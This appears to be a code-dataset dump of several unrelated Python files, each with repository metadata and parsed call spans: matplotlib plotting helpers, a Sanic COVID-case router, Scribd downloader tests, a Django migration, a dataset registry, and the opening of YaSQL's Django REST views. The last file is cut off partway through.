def plot_lifetime_histogram(track,axes=None,bin_edges=np.arange(0,200,20),density=False,**kwargs):
hist, bin_edges,bin_centers = lifetime_histogram(track,bin_edges=bin_edges,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
def plot_lifetime_histogram_bar(track,axes=None,bin_edges=np.arange(0,200,20),density=False,width_bar=1,shift=0.5,**kwargs):
hist, bin_edges, bin_centers = lifetime_histogram(track,bin_edges=bin_edges,density=density)
plot_hist=axes.bar(bin_centers+shift,hist,width=width_bar,**kwargs)
return plot_hist
def plot_histogram_cellwise(track,bin_edges,variable,quantity,axes=None,density=False,**kwargs):
hist, bin_edges,bin_centers = histogram_cellwise(track,bin_edges=bin_edges,variable=variable,quantity=quantity,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
def plot_histogram_featurewise(Track,bin_edges,variable,axes=None,density=False,**kwargs):
hist, bin_edges, bin_centers = histogram_featurewise(Track,bin_edges=bin_edges,variable=variable,density=density)
plot_hist=axes.plot(bin_centers, hist,**kwargs)
return plot_hist
| [((2, 0, 2, 14), 'matplotlib.use', 'mpl.use', ({(2, 8, 2, 13): '"""Agg"""'}, {}), "('Agg')", True, 'import matplotlib as mpl\n'), ((17, 4, 17, 39), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((73, 19, 73, 56), 'matplotlib.ticker.MaxNLocator', 'MaxNLocator', (), '', False, 'from matplotlib.ticker import MaxNLocator\n'), ((83, 10, 83, 102), 'cartopy.feature.NaturalEarthFeature', 'cfeature.NaturalEarthFeature', (), '', True, 'import cartopy.feature as cfeature\n'), ((175, 8, 175, 35), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((176, 4, 176, 15), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((299, 14, 299, 39), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', ({(299, 34, 299, 38): 'axes'}, {}), '(axes)', False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((542, 14, 542, 39), 'mpl_toolkits.axes_grid1.make_axes_locatable', 'make_axes_locatable', ({(542, 34, 542, 38): 'axes'}, {}), '(axes)', False, 'from mpl_toolkits.axes_grid1 import make_axes_locatable\n'), ((952, 17, 952, 52), 'numpy.meshgrid', 'np.meshgrid', (), '', True, 'import numpy as np\n'), ((1109, 37, 1109, 86), 'pandas.to_timedelta', 'pd.to_timedelta', ({(1109, 53, 1109, 85): "track_variable_cell['time_cell']"}, {}), "(track_variable_cell['time_cell'])", True, 'import pandas as pd\n'), ((1249, 18, 1249, 71), 'matplotlib.ticker.MaxNLocator', 'mticker.MaxNLocator', (), '', True, 'import matplotlib.ticker as mticker\n'), ((1250, 18, 1250, 71), 'matplotlib.ticker.MaxNLocator', 'mticker.MaxNLocator', (), '', True, 'import matplotlib.ticker as mticker\n'), ((1257, 54, 1257, 73), 'numpy.arange', 'np.arange', ({(1257, 64, 1257, 65): '(0)', (1257, 66, 1257, 69): '(200)', (1257, 70, 1257, 72): '(20)'}, {}), '(0, 200, 20)', True, 'import numpy as np\n'), ((1262, 58, 1262, 77), 'numpy.arange', 'np.arange', ({(1262, 68, 1262, 69): '(0)', (1262, 70, 1262, 73): '(200)', (1262, 74, 1262, 76): '(20)'}, {}), '(0, 200, 20)', True, 'import numpy as np\n'), ((23, 26, 23, 53), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((33, 8, 33, 44), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((34, 21, 34, 75), 'os.path.join', 'os.path.join', ({(34, 34, 34, 42): 'plot_dir', (34, 43, 34, 74): "name + '_' + datestring_file + '.png'"}, {}), "(plot_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((38, 8, 38, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((99, 13, 99, 123), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((106, 23, 106, 50), 'matplotlib.ticker.MaxNLocator', 'ticker.MaxNLocator', (), '', False, 'from matplotlib import ticker\n'), ((181, 26, 181, 50), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((214, 26, 214, 54), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((215, 23, 215, 156), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((216, 23, 216, 156), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((247, 20, 247, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((265, 18, 265, 45), 'os.path.join', 'os.path.join', ({(265, 31, 265, 38): 'plotdir', (265, 40, 265, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((266, 8, 266, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((275, 8, 275, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((276, 8, 276, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((314, 21, 314, 78), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((315, 19, 315, 89), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((318, 28, 318, 90), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((347, 20, 347, 92), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((350, 29, 350, 122), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((445, 26, 445, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((447, 23, 447, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((448, 23, 448, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((486, 20, 486, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((507, 18, 507, 45), 'os.path.join', 'os.path.join', ({(507, 31, 507, 38): 'plotdir', (507, 40, 507, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((508, 8, 508, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((517, 8, 517, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((518, 8, 518, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((556, 21, 556, 78), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((557, 13, 557, 83), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((560, 28, 560, 84), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((586, 20, 586, 92), 'matplotlib.pyplot.cm.ScalarMappable', 'plt.cm.ScalarMappable', (), '', True, 'import matplotlib.pyplot as plt\n'), ((589, 29, 589, 122), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (), '', True, 'import matplotlib.pyplot as plt\n'), ((704, 26, 704, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((706, 23, 706, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((707, 23, 707, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((745, 13, 745, 56), 'matplotlib.pyplot.figure', 'plt.figure', (), '', True, 'import matplotlib.pyplot as plt\n'), ((749, 14, 749, 58), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (), '', True, 'import matplotlib.gridspec as gridspec\n'), ((783, 18, 783, 45), 'os.path.join', 'os.path.join', ({(783, 31, 783, 38): 'plotdir', (783, 40, 783, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((784, 8, 784, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((793, 8, 793, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((794, 8, 794, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((830, 26, 830, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((832, 23, 832, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((833, 23, 833, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((873, 20, 873, 111), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((894, 18, 894, 45), 'os.path.join', 'os.path.join', ({(894, 31, 894, 38): 'plotdir', (894, 40, 894, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((895, 8, 895, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((904, 8, 904, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((905, 8, 905, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1120, 26, 1120, 49), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1121, 23, 1121, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1122, 23, 1122, 94), 'iris.Constraint', 'Constraint', (), '', False, 'from iris import Constraint\n'), ((1159, 20, 1159, 67), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((1216, 18, 1216, 45), 'os.path.join', 'os.path.join', ({(1216, 31, 1216, 38): 'plotdir', (1216, 40, 1216, 44): 'name'}, {}), '(plotdir, name)', False, 'import os\n'), ((1217, 8, 1217, 43), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((1226, 8, 1226, 19), 'matplotlib.pyplot.close', 'plt.close', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1227, 8, 1227, 17), 'matplotlib.pyplot.clf', 'plt.clf', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((89, 15, 89, 35), 'numpy.isnan', 'np.isnan', ({(89, 24, 89, 34): 'field.data'}, {}), '(field.data)', True, 'import numpy as np\n'), ((136, 15, 136, 29), 'numpy.isnan', 'np.isnan', ({(136, 24, 136, 28): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((157, 12, 160, 35), 'iris.plot.contour', 'iplt.contour', (), '', True, 'import iris.plot as iplt\n'), ((268, 27, 268, 88), 'os.path.join', 'os.path.join', ({(268, 40, 268, 47): 'out_dir', (268, 49, 268, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((270, 12, 270, 90), 'logging.debug', 'logging.debug', ({(270, 26, 270, 89): "('field_contour field_filled Mask plot saved to ' + savepath_png)"}, {}), "('field_contour field_filled Mask plot saved to ' + savepath_png)", False, 'import logging\n'), ((272, 27, 272, 88), 'os.path.join', 'os.path.join', ({(272, 40, 272, 47): 'out_dir', (272, 49, 272, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((274, 12, 274, 90), 'logging.debug', 'logging.debug', ({(274, 26, 274, 89): "('field_contour field_filled Mask plot saved to ' + savepath_pdf)"}, {}), "('field_contour field_filled Mask plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((305, 32, 305, 102), 'numpy.linspace', 'np.linspace', ({(305, 44, 305, 61): 'vmin_field_filled', (305, 62, 305, 79): 'vmax_field_filled', (305, 81, 305, 101): 'nlevels_field_filled'}, {}), '(vmin_field_filled, vmax_field_filled, nlevels_field_filled)', True, 'import numpy as np\n'), ((324, 33, 324, 107), 'numpy.linspace', 'np.linspace', ({(324, 45, 324, 63): 'vmin_field_contour', (324, 65, 324, 83): 'vmax_field_contour', (324, 85, 324, 106): 'nlevels_field_contour'}, {}), '(vmin_field_contour, vmax_field_contour, nlevels_field_contour)', True, 'import numpy as np\n'), ((345, 26, 345, 85), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((510, 27, 510, 88), 'os.path.join', 'os.path.join', ({(510, 40, 510, 47): 'out_dir', (510, 49, 510, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((512, 12, 512, 70), 'logging.debug', 'logging.debug', ({(512, 26, 512, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((514, 27, 514, 88), 'os.path.join', 'os.path.join', ({(514, 40, 514, 47): 'out_dir', (514, 49, 514, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((516, 12, 516, 70), 'logging.debug', 'logging.debug', ({(516, 26, 516, 69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((546, 32, 546, 84), 'numpy.linspace', 'np.linspace', ({(546, 44, 546, 61): 'vmin_field_filled', (546, 62, 546, 79): 'vmax_field_filled', (546, 81, 546, 83): '10'}, {}), '(vmin_field_filled, vmax_field_filled, 10)', True, 'import numpy as np\n'), ((567, 33, 567, 87), 'numpy.linspace', 'np.linspace', ({(567, 45, 567, 63): 'vmin_field_contour', (567, 65, 567, 83): 'vmax_field_contour', (567, 85, 567, 86): '5'}, {}), '(vmin_field_contour, vmax_field_contour, 5)', True, 'import numpy as np\n'), ((584, 26, 584, 85), 'matplotlib.colors.Normalize', 'Normalize', (), '', False, 'from matplotlib.colors import Normalize\n'), ((605, 13, 605, 27), 'numpy.isnan', 'np.isnan', ({(605, 22, 605, 26): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((786, 27, 786, 88), 'os.path.join', 'os.path.join', ({(786, 40, 786, 47): 'out_dir', (786, 49, 786, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((788, 12, 788, 76), 'logging.debug', 'logging.debug', ({(788, 26, 788, 75): "('Mask static 2d/3D plot saved to ' + savepath_png)"}, {}), "('Mask static 2d/3D plot saved to ' + savepath_png)", False, 'import logging\n'), ((790, 27, 790, 88), 'os.path.join', 'os.path.join', ({(790, 40, 790, 47): 'out_dir', (790, 49, 790, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((792, 12, 792, 76), 'logging.debug', 'logging.debug', ({(792, 26, 792, 75): "('Mask static 2d/3D plot saved to ' + savepath_pdf)"}, {}), "('Mask static 2d/3D plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((897, 27, 897, 88), 'os.path.join', 'os.path.join', ({(897, 40, 897, 47): 'out_dir', (897, 49, 897, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((899, 12, 899, 70), 'logging.debug', 'logging.debug', ({(899, 26, 899, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((901, 27, 901, 88), 'os.path.join', 'os.path.join', ({(901, 40, 901, 47): 'out_dir', (901, 49, 901, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((903, 12, 903, 70), 'logging.debug', 'logging.debug', ({(903, 26, 903, 69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((1019, 13, 1019, 27), 'numpy.isnan', 'np.isnan', ({(1019, 22, 1019, 26): 'cell'}, {}), '(cell)', True, 'import numpy as np\n'), ((1200, 26, 1200, 45), 'numpy.arange', 'np.arange', ({(1200, 36, 1200, 37): '(0)', (1200, 38, 1200, 41): '(120)', (1200, 42, 1200, 44): '(15)'}, {}), '(0, 120, 15)', True, 'import numpy as np\n'), ((1219, 27, 1219, 88), 'os.path.join', 'os.path.join', ({(1219, 40, 1219, 47): 'out_dir', (1219, 49, 1219, 87): "name + '_' + datestring_file + '.png'"}, {}), "(out_dir, name + '_' + datestring_file + '.png')", False, 'import os\n'), ((1221, 12, 1221, 70), 'logging.debug', 'logging.debug', ({(1221, 26, 1221, 69): "('Mask static plot saved to ' + savepath_png)"}, {}), "('Mask static plot saved to ' + savepath_png)", False, 'import logging\n'), ((1223, 27, 1223, 88), 'os.path.join', 'os.path.join', ({(1223, 40, 1223, 47): 'out_dir', (1223, 49, 1223, 87): "name + '_' + datestring_file + '.pdf'"}, {}), "(out_dir, name + '_' + datestring_file + '.pdf')", False, 'import os\n'), ((1225, 12, 1225, 70), 'logging.debug', 'logging.debug', ({(1225, 26, 1225, 69): "('Mask static plot saved to ' + savepath_pdf)"}, {}), "('Mask static plot saved to ' + savepath_pdf)", False, 'import logging\n'), ((1243, 28, 1243, 46), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((92, 35, 92, 70), 'numpy.linspace', 'np.linspace', (), '', True, 'import numpy as np\n'), ((180, 42, 180, 60), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((24, 90, 24, 108), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ({}, {}), '()', True, 'import cartopy.crs as ccrs\n'), ((437, 18, 437, 62), 'numpy.where', 'np.where', ({(437, 27, 437, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((696, 18, 696, 62), 'numpy.where', 'np.where', ({(696, 27, 696, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((822, 18, 822, 62), 'numpy.where', 'np.where', ({(822, 27, 822, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((1115, 18, 1115, 62), 'numpy.where', 'np.where', ({(1115, 27, 1115, 61): "time == track_cell['time'].values[0]"}, {}), "(time == track_cell['time'].values[0])", True, 'import numpy as np\n'), ((438, 26, 438, 71), 'numpy.where', 'np.where', ({(438, 35, 438, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((697, 26, 697, 71), 'numpy.where', 'np.where', ({(697, 35, 697, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((823, 26, 823, 71), 'numpy.where', 'np.where', ({(823, 35, 823, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n'), ((1116, 26, 1116, 71), 'numpy.where', 'np.where', ({(1116, 35, 1116, 70): "time == track_cell['time'].values[-1]"}, {}), "(time == track_cell['time'].values[-1])", True, 'import numpy as np\n')] |
nf1s/covid-backend | api/urls.py | 5529cccad2b0b596d8a720fd6211035e6376820f | from sanic import Blueprint
from sanic_transmute import add_route
from .views import (
get_all,
get_status_by_country_id,
get_status_by_country_name,
get_deaths,
get_active_cases,
get_recovered_cases,
get_confirmed_cases,
list_countries,
)
cases = Blueprint("cases", url_prefix="/cases")
add_route(cases, get_all)
add_route(cases, get_status_by_country_id)
add_route(cases, get_status_by_country_name)
add_route(cases, get_deaths)
add_route(cases, get_active_cases)
add_route(cases, get_recovered_cases)
add_route(cases, get_confirmed_cases)
add_route(cases, list_countries)
| [((14, 8, 14, 47), 'sanic.Blueprint', 'Blueprint', (), '', False, 'from sanic import Blueprint\n'), ((15, 0, 15, 25), 'sanic_transmute.add_route', 'add_route', ({(15, 10, 15, 15): 'cases', (15, 17, 15, 24): 'get_all'}, {}), '(cases, get_all)', False, 'from sanic_transmute import add_route\n'), ((16, 0, 16, 42), 'sanic_transmute.add_route', 'add_route', ({(16, 10, 16, 15): 'cases', (16, 17, 16, 41): 'get_status_by_country_id'}, {}), '(cases, get_status_by_country_id)', False, 'from sanic_transmute import add_route\n'), ((17, 0, 17, 44), 'sanic_transmute.add_route', 'add_route', ({(17, 10, 17, 15): 'cases', (17, 17, 17, 43): 'get_status_by_country_name'}, {}), '(cases, get_status_by_country_name)', False, 'from sanic_transmute import add_route\n'), ((18, 0, 18, 28), 'sanic_transmute.add_route', 'add_route', ({(18, 10, 18, 15): 'cases', (18, 17, 18, 27): 'get_deaths'}, {}), '(cases, get_deaths)', False, 'from sanic_transmute import add_route\n'), ((19, 0, 19, 34), 'sanic_transmute.add_route', 'add_route', ({(19, 10, 19, 15): 'cases', (19, 17, 19, 33): 'get_active_cases'}, {}), '(cases, get_active_cases)', False, 'from sanic_transmute import add_route\n'), ((20, 0, 20, 37), 'sanic_transmute.add_route', 'add_route', ({(20, 10, 20, 15): 'cases', (20, 17, 20, 36): 'get_recovered_cases'}, {}), '(cases, get_recovered_cases)', False, 'from sanic_transmute import add_route\n'), ((21, 0, 21, 37), 'sanic_transmute.add_route', 'add_route', ({(21, 10, 21, 15): 'cases', (21, 17, 21, 36): 'get_confirmed_cases'}, {}), '(cases, get_confirmed_cases)', False, 'from sanic_transmute import add_route\n'), ((22, 0, 22, 32), 'sanic_transmute.add_route', 'add_route', ({(22, 10, 22, 15): 'cases', (22, 17, 22, 31): 'list_countries'}, {}), '(cases, list_countries)', False, 'from sanic_transmute import add_route\n')] |
fatshotty/scribd-downloader | scribdl/test/test_download.py | d07e301c0a7781cf0b8cf38846061e043e8b86e9 | from ..downloader import Downloader
import os
import pytest
@pytest.fixture
def cwd_to_tmpdir(tmpdir):
os.chdir(str(tmpdir))
def test_audiobook_download(cwd_to_tmpdir, monkeypatch):
audiobook_url = "https://www.scribd.com/audiobook/237606860/100-Ways-to-Motivate-Yourself-Change-Your-Life-Forever"
audiobook_downloader = Downloader(audiobook_url)
audio = audiobook_downloader.download()
assert audio[0] == "100_Ways_to_Motivate_Yourself__Change_Your_Life_Forever_preview.mp3"
assert os.path.getsize(audio[0]) == 2127830
def test_text_document_download(cwd_to_tmpdir):
text_doc_url = "https://www.scribd.com/document/96882378/Trademark-License-Agreement"
text_downloader = Downloader(text_doc_url)
md_doc = text_downloader.download(is_image_document=False)
assert os.path.getsize(md_doc.input_content) in range(1000, 2000)
md_doc.to_pdf()
assert os.path.getsize(md_doc.pdf_path) in range(20000, 31000)
def test_img_document_download(cwd_to_tmpdir):
img_doc_url = "https://www.scribd.com/doc/136711944/Signature-Scanning-and-Verification-in-Finacle"
img_downloader = Downloader(img_doc_url)
imgs = img_downloader.download(is_image_document=True)
assert len(imgs.input_content) == 2
imgs.to_pdf()
assert os.path.getsize(imgs.pdf_path) in range(140000, 150000)
def test_book_download(cwd_to_tmpdir, monkeypatch):
book_url = "https://www.scribd.com/read/262694921/Acting-The-First-Six-Lessons"
book_downloader = Downloader(book_url)
# We don't want to clutter stdout with book contents if this test fails
monkeypatch.setattr("builtins.print", lambda x: None)
md_book = book_downloader.download()
assert os.path.getsize(md_book.input_content) in range(10000, 20000)
md_book.to_pdf()
assert os.path.getsize(md_book.pdf_path) in range(200000, 2500000)
| [((17, 11, 17, 36), 'os.path.getsize', 'os.path.getsize', ({(17, 27, 17, 35): 'audio[0]'}, {}), '(audio[0])', False, 'import os\n'), ((24, 11, 24, 48), 'os.path.getsize', 'os.path.getsize', ({(24, 27, 24, 47): 'md_doc.input_content'}, {}), '(md_doc.input_content)', False, 'import os\n'), ((26, 11, 26, 43), 'os.path.getsize', 'os.path.getsize', ({(26, 27, 26, 42): 'md_doc.pdf_path'}, {}), '(md_doc.pdf_path)', False, 'import os\n'), ((35, 11, 35, 41), 'os.path.getsize', 'os.path.getsize', ({(35, 27, 35, 40): 'imgs.pdf_path'}, {}), '(imgs.pdf_path)', False, 'import os\n'), ((44, 11, 44, 49), 'os.path.getsize', 'os.path.getsize', ({(44, 27, 44, 48): 'md_book.input_content'}, {}), '(md_book.input_content)', False, 'import os\n'), ((46, 11, 46, 44), 'os.path.getsize', 'os.path.getsize', ({(46, 27, 46, 43): 'md_book.pdf_path'}, {}), '(md_book.pdf_path)', False, 'import os\n')] |
hungitptit/boecdjango | app/migrations/0005_auto_20210619_2310.py | a1125bd292b5fd3a0610eda6e592017f8268c96c | # Generated by Django 3.2.4 on 2021-06-19 16:10
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('app', '0004_auto_20210619_1802'),
]
operations = [
migrations.AddField(
model_name='comment',
name='create_at',
field=models.DateTimeField(auto_now_add=True, db_column='create_at', default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='comment',
name='subject',
field=models.CharField(blank=True, max_length=255),
),
migrations.AddField(
model_name='comment',
name='update_at',
field=models.DateTimeField(auto_now=True, db_column='update_at'),
),
]
| [((17, 18, 17, 115), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((23, 18, 23, 62), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((28, 18, 28, 76), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n')] |
shonohs/vision-datasets | vision_datasets/common/dataset_registry.py | bdd0ebf5c0c0561486ebb0b96600196b2b89f77c | import copy
import json
from .dataset_info import DatasetInfoFactory
class DatasetRegistry:
"""
A central registry of all available datasets
"""
def __init__(self, datasets_json: str):
self.datasets = [DatasetInfoFactory.create(d) for d in json.loads(datasets_json)]
def get_dataset_info(self, dataset_name, dataset_version=None):
datasets = [d for d in self.datasets if d.name == dataset_name and (not dataset_version or d.version == dataset_version)]
if not datasets:
return None
sorted_datasets = sorted(datasets, key=lambda d: d.version)
return copy.deepcopy(sorted_datasets[-1])
def list_data_version_and_types(self):
return [{'name': d.name, 'version': d.version, 'type': d.type, 'description': d.description} for d in self.datasets]
@staticmethod
def _get_default_dataset_json(json_file_name):
import sys
py_version = sys.version_info
if py_version.minor >= 7:
import importlib.resources as pkg_resources
from vision_datasets import resources
datasets_json = pkg_resources.read_text(resources, json_file_name)
else:
import pkgutil
resource_package = 'vision_datasets'
resource_path = '/'.join(('resources', json_file_name))
datasets_json = pkgutil.get_data(resource_package, resource_path)
return datasets_json
| [((20, 15, 20, 49), 'copy.deepcopy', 'copy.deepcopy', ({(20, 29, 20, 48): 'sorted_datasets[-1]'}, {}), '(sorted_datasets[-1])', False, 'import copy\n'), ((32, 28, 32, 78), 'importlib.resources.read_text', 'pkg_resources.read_text', ({(32, 52, 32, 61): 'resources', (32, 63, 32, 77): 'json_file_name'}, {}), '(resources, json_file_name)', True, 'import importlib.resources as pkg_resources\n'), ((37, 28, 37, 77), 'pkgutil.get_data', 'pkgutil.get_data', ({(37, 45, 37, 61): 'resource_package', (37, 63, 37, 76): 'resource_path'}, {}), '(resource_package, resource_path)', False, 'import pkgutil\n'), ((12, 63, 12, 88), 'json.loads', 'json.loads', ({(12, 74, 12, 87): 'datasets_json'}, {}), '(datasets_json)', False, 'import json\n')] |
Fanduzi/YaSQL | yasql/apps/sqlorders/views.py | bc6366a9b1c1e9ed84fd24ea2b4a21f8f99d0af5 | # -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
# 获取工单环境
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
# 获取指定环境指定用途的schemas列表
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
